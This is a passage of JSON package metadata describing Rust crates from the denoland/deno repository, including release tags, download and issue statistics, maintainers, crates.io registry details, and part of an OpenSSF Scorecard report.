ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T22:49:58.837Z","dependent_packages_count":0,"downloads":3103,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":88.76217778322139,"dependent_repos_count":13.592702189210836,"dependent_packages_count":17.954574040606648,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.10315133767963},"purl":"pkg:cargo/fast-registry-json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/fast-registry-json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/fast-registry-json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/fast-registry-json/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-07-03T14:21:50.110Z","updated_at":"2026-07-03T14:21:50.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-07-03T14:21:50.204Z","updated_at":"2026-07-03T14:21:50.204Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047108,"name":"deno_console","ecosystem":"cargo","description":"DEPRECATED: use `deno_web` instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":225,"first_release_published_at":"2021-03-12T21:01:57.003Z","latest_release_published_at":"2025-11-05T07:55:05.769Z","latest_release_number":"0.222.0","last_synced_at":"2026-08-29T21:57:14.497Z","created_at":"2022-04-12T09:58:23.096Z","updated_at":"2026-08-29T21:57:14.497Z","registry_url":"https://crates.io/crates/deno_console/","install_command":"cargo install deno_console","documentation_url":"https://docs.rs/deno_console/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: 